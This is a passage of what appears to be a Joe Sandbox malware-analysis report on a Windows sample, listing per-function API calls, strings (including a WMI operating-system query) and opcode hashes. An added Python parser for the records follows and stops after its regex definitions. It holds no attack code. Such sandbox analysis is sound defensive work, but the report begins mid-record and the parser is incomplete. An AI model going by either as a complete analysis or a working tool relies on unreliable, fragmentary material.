                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                              • Instruction ID: eb279d10c263f8275e595969dbeef82811127671f95de4ce92023c06458f847b
                                                                                              • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                              • Instruction Fuzzy Hash: B151787CA00785A7DF388F6886567FE27A59BD7304F18092EE882CF282C654FD459357
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0cfa9c71070b3751736a2e622205b97b3151de0d597ac51fbeaa0e176090b886
                                                                                              • Instruction ID: 922a026c4816e62ab723cd325bc8137b90524f1aef67b338c6cd3fd851a8524f
                                                                                              • Opcode Fuzzy Hash: 0cfa9c71070b3751736a2e622205b97b3151de0d597ac51fbeaa0e176090b886
                                                                                              • Instruction Fuzzy Hash: 3E51A1315093D58FC712CF28C1909AFBFF0AE9A714F4A0999F5D95B242D231DB8ACB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eb8c619cb72cdf48328bda3d085b270129c574df6b38a3bd43d50674ed52db70
                                                                                              • Instruction ID: 2c66a7d93bef5a3199e1f9cc0f478a0de92fe7d536ebb3c0c7d18fcc8fa7172a
                                                                                              • Opcode Fuzzy Hash: eb8c619cb72cdf48328bda3d085b270129c574df6b38a3bd43d50674ed52db70
                                                                                              • Instruction Fuzzy Hash: A951DFB1A087119FC748CF19D48055AF7E1FF88314F058A2EF899E3740D734E9598B96
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
• Instruction ID: 1795d8cd153b35ec4cf6dbe7acc42246002ebf0ebf2c5884bf63d8784c23395a
• Opcode Fuzzy Hash: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
• Instruction Fuzzy Hash: 2231E3B1A14B168FC714EF2CD95126ABBE0EB95300F108A2DF496C7742C735E90ACF91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00A3D889
  • Part of subcall function 00A3C504: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00A3C5EB
• _wcslen.LIBCMT ref: 00A3DB4F
• _wcslen.LIBCMT ref: 00A3DB58
• SetWindowTextW.USER32(?,?), ref: 00A3DBB6
• _wcslen.LIBCMT ref: 00A3DBF8
• _wcsrchr.LIBVCRUNTIME ref: 00A3DD40
• GetDlgItem.USER32(?,00000066), ref: 00A3DD7B
• SetWindowTextW.USER32(00000000,?), ref: 00A3DD8B
• SendMessageW.USER32(00000000,00000143,00000000,00A7389A), ref: 00A3DD99
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A3DDC4
Strings
Similarity
• API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
• String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
• API String ID: 2804936435-312220925
• Opcode ID: f7fe41aa12786bb781d1e838e47a45475befe4794e0cb6d91f74a8edc6c720dd
• Instruction ID: 3521235f0c0658506784d06d80562abd651961d1720ec8c2e00fbf54d8f7e12c
• Opcode Fuzzy Hash: f7fe41aa12786bb781d1e838e47a45475befe4794e0cb6d91f74a8edc6c720dd
• Instruction Fuzzy Hash: 8EE144B2D00218ABDF25DBA4ED85EEE73BCAB04354F5444A6F605E7090EF749E85CB60
Uniqueness
Uniqueness Score: -1.00%

APIs
• _swprintf.LIBCMT ref: 00A2F62E
  • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
  • Part of subcall function 00A330F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00A63070,00000200,00A2EC48,00000000,?,00000050,00A63070), ref: 00A33112
• _strlen.LIBCMT ref: 00A2F64F
• SetDlgItemTextW.USER32(?,00A60274,?), ref: 00A2F6AF
• GetWindowRect.USER32(?,?), ref: 00A2F6E9
• GetClientRect.USER32(?,?), ref: 00A2F6F5
• GetWindowLongW.USER32(?,000000F0), ref: 00A2F795
• GetWindowRect.USER32(?,?), ref: 00A2F7C2
• SetWindowTextW.USER32(?,?), ref: 00A2F7FB
• GetSystemMetrics.USER32(00000008), ref: 00A2F803
• GetWindow.USER32(?,00000005), ref: 00A2F80E
• GetWindowRect.USER32(00000000,?), ref: 00A2F83B
• GetWindow.USER32(00000000,00000002), ref: 00A2F8AD
Strings
Similarity
• API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
• String ID: $%s:$CAPTION$d
• API String ID: 2407758923-2512411981
• Opcode ID: 12a73695150c0eb30346bef374cfe41596bf3aa8df570d11e259c580e13cd3e8
• Instruction ID: d7459ad9288249f7a6271d4dd9e4e3e7f38149346e317d3d7ee8e824f225d854
• Opcode Fuzzy Hash: 12a73695150c0eb30346bef374cfe41596bf3aa8df570d11e259c580e13cd3e8
• Instruction Fuzzy Hash: 34817F72508351AFD710DFA8DD89A6BBBF9EB88714F04093DFA85A7250D670E8098B52
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___free_lconv_mon.LIBCMT ref: 00A4DD26
  • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D8DE
  • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D8F0
  • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D902
  • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D914
  • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D926
  • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D938
  • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D94A
  • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D95C
  • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D96E
  • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D980
  • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D992
  • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D9A4
  • Part of subcall function 00A4D8C1: _free.LIBCMT ref: 00A4D9B6
• _free.LIBCMT ref: 00A4DD1B
  • Part of subcall function 00A4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?), ref: 00A4A680
  • Part of subcall function 00A4A66A: GetLastError.KERNEL32(?,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?,?), ref: 00A4A692
• _free.LIBCMT ref: 00A4DD3D
• _free.LIBCMT ref: 00A4DD52
• _free.LIBCMT ref: 00A4DD5D
• _free.LIBCMT ref: 00A4DD7F
• _free.LIBCMT ref: 00A4DD92
• _free.LIBCMT ref: 00A4DDA0
• _free.LIBCMT ref: 00A4DDAB
• _free.LIBCMT ref: 00A4DDE3
• _free.LIBCMT ref: 00A4DDEA
• _free.LIBCMT ref: 00A4DE07
• _free.LIBCMT ref: 00A4DE1F
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: d834bb1db75a41e3137eadd1f533f3ce1aab065ec04b65967094b81c92d3b4fe
• Instruction ID: 6223d1d6085ed49efe00ed20915a15aa75c38d389a0059d268ed1d0891bc1d64
• Opcode Fuzzy Hash: d834bb1db75a41e3137eadd1f533f3ce1aab065ec04b65967094b81c92d3b4fe
• Instruction Fuzzy Hash: 4831583AA003009FEB20AB38D945F5AB3E9FFA0710F59482AE049DB191DB31AC90CB51
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindow.USER32(?,00000005), ref: 00A3E811
• GetClassNameW.USER32(00000000,?,00000800), ref: 00A3E83D
  • Part of subcall function 00A33316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00A2D523,00000000,.exe,?,?,00000800,?,?,?,00A39E5C), ref: 00A3332C
• GetWindowLongW.USER32(00000000,000000F0), ref: 00A3E859
• SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00A3E870
• GetObjectW.GDI32(00000000,00000018,?), ref: 00A3E884
• SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00A3E8AD
• DeleteObject.GDI32(00000000), ref: 00A3E8B4
• GetWindow.USER32(00000000,00000002), ref: 00A3E8BD
Strings
Similarity
• API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
• String ID: STATIC
• API String ID: 3820355801-1882779555
• Opcode ID: 3008e2df4448969e3dd50ba3ea3dffbd48d14d4fc1cef41bde2d9035477c1b70
• Instruction ID: 61e019b8ae2b34fea6c1ab9997b43c90616846f767488c53f0ca4803ddc5e9cf
• Opcode Fuzzy Hash: 3008e2df4448969e3dd50ba3ea3dffbd48d14d4fc1cef41bde2d9035477c1b70
• Instruction Fuzzy Hash: DA11CD32D44B107BE620EBB09C4AFAB2AAEBB54711F004520FE41A50E2DB64890687B5
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 00A4A435
  • Part of subcall function 00A4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?), ref: 00A4A680
  • Part of subcall function 00A4A66A: GetLastError.KERNEL32(?,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?,?), ref: 00A4A692
• _free.LIBCMT ref: 00A4A441
• _free.LIBCMT ref: 00A4A44C
• _free.LIBCMT ref: 00A4A457
• _free.LIBCMT ref: 00A4A462
• _free.LIBCMT ref: 00A4A46D
• _free.LIBCMT ref: 00A4A478
• _free.LIBCMT ref: 00A4A483
• _free.LIBCMT ref: 00A4A48E
• _free.LIBCMT ref: 00A4A49C
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 1f53c5c8eb571815355fbb944fb0fc58c1250bd1f4d1ad8f57742b7a688b37b3
• Instruction ID: ff37daa0eb3ff1d3b27bd4b13851a05778408ce723b10d4291cc136080a334d3
• Opcode Fuzzy Hash: 1f53c5c8eb571815355fbb944fb0fc58c1250bd1f4d1ad8f57742b7a688b37b3
• Instruction Fuzzy Hash: 4811A77A150108AFCB01EF54CA52CDD7BB9EF64750F8681A5FA084F122D631EE619B41
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
                                                                                              Similarity
                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 322700389-393685449
                                                                                              • Opcode ID: 4477ec01d105e3407a1c70e5adebcbe2192b813ef4db4073335a6af7130eada4
                                                                                              • Instruction ID: f2864861be7a7517543f3195c1c0a9d1759fdd0aeec779a4b5e70aabea1ccec7
                                                                                              • Opcode Fuzzy Hash: 4477ec01d105e3407a1c70e5adebcbe2192b813ef4db4073335a6af7130eada4
                                                                                              • Instruction Fuzzy Hash: ADB1AE7980020AEFCF24DFA4C981AAEBBB5FF98310F14415AF8116B212D775EA51CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• _wcslen.LIBCMT ref: 00A3A6F6
• _wcslen.LIBCMT ref: 00A3A796
• GlobalAlloc.KERNEL32(00000040,?), ref: 00A3A7A5
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00A3A7C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: _wcslen$AllocByteCharGlobalMultiWide
• String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
• API String ID: 1116704506-4209811716
• Opcode ID: da355092e6e1ecd8625f0d6315d1da1cd5e0dd5f63935fa42679e3db3d1d0586
• Instruction ID: 754c65731e427434178689ef4355fd8c84b4f2b00b2015ddc62441ed4902f4c4
• Opcode Fuzzy Hash: da355092e6e1ecd8625f0d6315d1da1cd5e0dd5f63935fa42679e3db3d1d0586
• Instruction Fuzzy Hash: A23186321043617EE315AB709C86FAFB7A8FFA1320F14011EF841961D1EFA4D90982A6
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00A212F6: GetDlgItem.USER32(00000000,00003021), ref: 00A2133A
  • Part of subcall function 00A212F6: SetWindowTextW.USER32(00000000,00A545F4), ref: 00A21350
• EndDialog.USER32(?,00000001), ref: 00A3C800
• SendMessageW.USER32(?,00000080,00000001,?), ref: 00A3C827
• SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00A3C840
• SetWindowTextW.USER32(?,?), ref: 00A3C851
• GetDlgItem.USER32(?,00000065), ref: 00A3C85A
• SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00A3C86E
• SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00A3C884
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: MessageSend$Item$TextWindow$Dialog
• String ID: LICENSEDLG
• API String ID: 3214253823-2177901306
• Opcode ID: d2a9809db40619f56b5ca4105b2e2ab35832995b8504aa9cee173c4e661ea58a
• Instruction ID: 143384b9ad5dce4138b928793681af9e2be5902be28239685d8566eae7527b0e
• Opcode Fuzzy Hash: d2a9809db40619f56b5ca4105b2e2ab35832995b8504aa9cee173c4e661ea58a
• Instruction Fuzzy Hash: 9821A372A502107BD611EFB9EC8DF7B3B7CEB46B55F004515FA40B60A0CB6299039771
Uniqueness

Uniqueness Score: -1.00%

APIs
• _wcslen.LIBCMT ref: 00A2B5E2
  • Part of subcall function 00A32701: GetSystemTime.KERNEL32(?), ref: 00A3270F
  • Part of subcall function 00A32701: SystemTimeToFileTime.KERNEL32(?,?), ref: 00A3271D
  • Part of subcall function 00A326AA: __aulldiv.LIBCMT ref: 00A326B3
• __aulldiv.LIBCMT ref: 00A2B60E
• GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00A2B615
• _swprintf.LIBCMT ref: 00A2B640
  • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
• _wcslen.LIBCMT ref: 00A2B64A
• _swprintf.LIBCMT ref: 00A2B6A0
• _wcslen.LIBCMT ref: 00A2B6AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
• String ID: %u.%03u
• API String ID: 2956649372-1114938957
• Opcode ID: 08998c02c240a6e591bcf33a09d252ef42ab2367d716b6a9c0595b084d3f74fc
• Instruction ID: 4debbf11cb861d7ae33af7f8b25549ac25f5eaa192268f7dca2b530dabde817f
• Opcode Fuzzy Hash: 08998c02c240a6e591bcf33a09d252ef42ab2367d716b6a9c0595b084d3f74fc
• Instruction Fuzzy Hash: 152183B2A18310AFD614EF69DD86E9B77ECEBD8750F00492AF545E3241DB34DA0887B1
Uniqueness

Uniqueness Score: -1.00%

APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00A3BC3F
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A3BC50
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00A3BC5E
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00A3BC6C
• GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A3BC87
• GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 00A3BCAE
• _swprintf.LIBCMT ref: 00A3BCD4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Time$System$File$Format$DateLocalSpecific_swprintf
• String ID: %s %s
• API String ID: 385609497-2939940506
• Opcode ID: c8ebacf9b620c6863e2c0a2c87d27e828d05332bc6a278f7235aa04716247e19
• Instruction ID: 9cae5042061687b64b2539557ede5a4f02ae003e2a396c20aca64ac227ebd6c5
• Opcode Fuzzy Hash: c8ebacf9b620c6863e2c0a2c87d27e828d05332bc6a278f7235aa04716247e19
• Instruction Fuzzy Hash: 2221C7B254115CABDB21DFA0EC45EEF3BADFF19345F140526FA09D2111E720DA89CB60
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00A2C43F,00A2C441,00000000,00000000,97CBF2BB,00000001,00000000,00000000,00A2C32C,?,?,?,00A2C43F,ROOT\CIMV2), ref: 00A40F59
• MultiByteToWideChar.KERNEL32(00000000,00000000,00A2C43F,?,00000000,00000000,?,?,?,?,?,00A2C43F), ref: 00A40FD4
• SysAllocString.OLEAUT32(00000000), ref: 00A40FDF
• _com_issue_error.COMSUPP ref: 00A41008
• _com_issue_error.COMSUPP ref: 00A41012
• GetLastError.KERNEL32(80070057,97CBF2BB,00000001,00000000,00000000,00A2C32C,?,?,?,00A2C43F,ROOT\CIMV2), ref: 00A41017
• _com_issue_error.COMSUPP ref: 00A4102A
• GetLastError.KERNEL32(00000000,?,00A2C43F,ROOT\CIMV2), ref: 00A41040
• _com_issue_error.COMSUPP ref: 00A41053
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
• String ID:
• API String ID: 1353541977-0
• Opcode ID: 8a263e58b2d381941164406b9c71103992f54628dad63300c359067d391aa88b
• Instruction ID: 982075656160dfe7aaa09e275d7d91fdc74c331885181f07540b8665342abfc4
• Opcode Fuzzy Hash: 8a263e58b2d381941164406b9c71103992f54628dad63300c359067d391aa88b
• Instruction Fuzzy Hash: 7D41F879A00315ABDB10DFA4DD45FAEBBB8FF88711F10422AF905E7280D775A88487A5
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: H_prolog
• String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
• API String ID: 3519838083-3505469590
• Opcode ID: 230dfb2736128c073b949b7db63544747cc2613cb832db76b994211ac285ae38
• Instruction ID: f3aab062afcdb34215ff6a043f979e8a3b27ea65fe677c94589e9b2b3a3fcb05
• Opcode Fuzzy Hash: 230dfb2736128c073b949b7db63544747cc2613cb832db76b994211ac285ae38
• Instruction Fuzzy Hash: D1713F71A00229AFDB14DFA8DC959BFB7B9FF48725B140569F506E72A0CB30AD42CB50
Uniqueness

Uniqueness Score: -1.00%

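The two records above (the COM/WMI helper at 00A40F59 and the function whose strings are ROOT\CIMV2, WQL, SELECT * FROM Win32_OperatingSystem and Windows 10) are easier to work with once the report's bullet lines are turned into structured data. The following parser is an added example for this page, not Joe Sandbox code and not code from the sample: it splits the function records into API calls (name, module, resolved arguments, call site, and the callee for "Part of subcall function" lines) and the $-joined String ID list, then flags the record that carries a WQL query against a WMI namespace. The embedded input is constructed from three records on this page, trimmed to the fields the parser reads; the record boundaries (an "APIs" header opens a record, "Uniqueness Score" closes it) are an assumption taken from this page's layout.

```python
"""Parse Joe Sandbox function-level records into API calls and strings, and flag
the WMI OS-version query. Added example; not Joe Sandbox or sample code."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: three records copied from this page, trimmed to the lines
# the parser consumes (bullet API lines, the Similarity fields, the closer).
SAMPLE = r"""
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00A2C43F,?,00000000,00000000,?,?,?,?,?,00A2C43F), ref: 00A40FD4
• SysAllocString.OLEAUT32(00000000), ref: 00A40FDF
• _com_issue_error.COMSUPP ref: 00A41008
• GetLastError.KERNEL32(00000000,?,00A2C43F,ROOT\CIMV2), ref: 00A41040
Similarity
• API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
• String ID:
• Opcode ID: 8a263e58b2d381941164406b9c71103992f54628dad63300c359067d391aa88b
Uniqueness Score: -1.00%
APIs
Similarity
• API ID: H_prolog
• String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
• Opcode ID: 230dfb2736128c073b949b7db63544747cc2613cb832db76b994211ac285ae38
Uniqueness Score: -1.00%
APIs
• __EH_prolog.LIBCMT ref: 00A2A5EE
  • Part of subcall function 00A2D6A7: _wcslen.LIBCMT ref: 00A2D6AF
• GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00A2A611
• MoveFileW.KERNEL32(?,?), ref: 00A2A73B
Similarity
• API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
• String ID: rtmp%d
• Opcode ID: 803b9c6ec0496532256ca9133fb3c38ef424ed138ecdbb6bc63f5682e34befc6
Uniqueness Score: -1.00%
"""

# One resolved call as the report prints it:  Name.MODULE(args), ref: ADDR
# or, for CRT helpers without resolved args:   Name.MODULE ref: ADDR
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<addr>[0-9A-F]+)$"
)
FIELD_RE = re.compile(r"^(?P<key>API ID|String ID|Opcode ID): ?(?P<val>.*)$")
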